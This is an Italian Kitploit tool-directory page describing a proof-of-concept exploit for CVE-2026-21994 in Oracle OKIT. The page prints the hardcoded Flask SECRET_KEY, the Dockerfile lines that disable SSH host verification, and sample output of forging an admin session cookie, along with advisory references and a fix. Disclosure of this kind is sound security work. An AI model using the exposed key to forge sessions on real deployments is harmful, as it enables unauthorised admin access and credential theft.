Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21994 — Proof-of-concept exploit per CVE-2026-21994, che dimostra la falsificazione di sessione admin non autenticata tramite una SECRET_KEY Flask hardcoded e il bypass della verifica host SSH in Oracle OKIT. | Kitploit
Strumenti/GitHubGitHub/g0w6y/cve-2026-21994
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza CloudAutenticazioneConfigurazione Errata
GitHubg0w6y/cve-2026-21994

CVE-2026-21994

Proof-of-concept exploit per CVE-2026-21994, che dimostra la falsificazione di sessione admin non autenticata tramite una SECRET_KEY Flask hardcoded e il bypass della verifica host SSH in Oracle OKIT.

Vedi Repository
85 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-21994

Riepilogo

Oracle OKIT (oci-designer-toolkit) versione 0.3.0 contiene due critiche misconfigurazioni che si concatenano in una compromissione totale non autenticata. Una SECRET_KEY Flask hardcoded esposta nel repository pubblico consente a qualsiasi attaccante di forgiare un cookie di sessione admin valido — senza richiedere credenziali. Separatamente, l'immagine Docker disabilita completamente la verifica dell'host SSH, consentendo a un attaccante di rete di intercettare le chiavi API OCI e le chiavi private durante le distribuzioni dell'infrastruttura.

Vulnerabilità

1. SECRET_KEY Hardcoded — okitclassic/okitserver/config.py:4

root@kitploit:~
SECRET_KEY='8980ffsd675747jjjh'

Flask utilizza questa chiave per firmare i cookie di sessione. Poiché è hardcoded in un repository pubblico, un attaccante può forgiare un cookie admin valido e accedere alla dashboard OKIT senza alcuna credenziale.


2. Verifica Host SSH Disabilitata — Dockerfile:41

root@kitploit:~
&& echo '  StrictHostKeyChecking no' >> /etc/ssh/ssh_config \
&& echo '  UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \

Il container non verifica mai le impronte digitali dell'host SSH. Un attaccante di rete può effettuare attacchi MitM sulle distribuzioni e rubare le credenziali OCI.

PoC

Esegui exploit.py all'interno della directory del repository clonato:

root@kitploit:~
python3 exploit.py
root@kitploit:~
[*] Scanning okitclassic/okitserver/config.py ...
[!] VULNERABLE — Hardcoded SECRET_KEY found: 8980ffsd675747jjjh
[+] Authentication bypass possible with zero credentials.

[*] Scanning Dockerfile ...
[!] VULNERABLE — SSH host verification is DISABLED.
[+] Network attacker can MitM deployments and steal OCI credentials.

[*] Forging admin session cookie ...
[!] SUCCESS — Forged cookie: .eJwlzj0OgkAQBeC7bG1...

Advisory

ID CVECVE-2026-21994
Advisory GitHubGHSA-g6qw-3gmw-m78m
CWECWE-284 — Controllo degli Accessi Improprio
Mappatura Advisory Oracleoracle.com/security-alerts/public-vuln-to-advisory-mapping
Riferimento CVE Oracleoracle.com/security-alerts/all-oracle-cves
Correzioneoracle/oci-designer-toolkit#780

Crediti

Scoperta e segnalata da Gouri Sankar A — g0w6y

Scarica lo strumento